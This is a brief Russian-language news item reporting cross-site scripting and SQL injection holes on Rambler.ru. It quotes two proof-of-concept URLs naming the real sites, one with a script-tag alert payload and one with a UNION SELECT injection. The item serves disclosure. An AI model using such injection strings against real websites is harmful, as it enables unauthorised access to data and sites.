CSS и SQL Ijection в Rambler.ru

Обнаружена возможность выполнения
произвольного кода и SQL Injection:

http://www.rambler.ru/db/news/news.html?dd= 6&dm=9&dy=<script>javascript:alert('hello')</script>
http://tv.rambler.ru/index.html?d=2004-09-05 &channel_id=0%20UNION%20SELECT%20null/*

Анатолий Ализар: Бывший автор новостной ленты «Хакера». Увлекается современными технологиями, оружием, информационной безопасностью, носимой электроникой и в целом концепцией Internet of Things.
Похожие материалы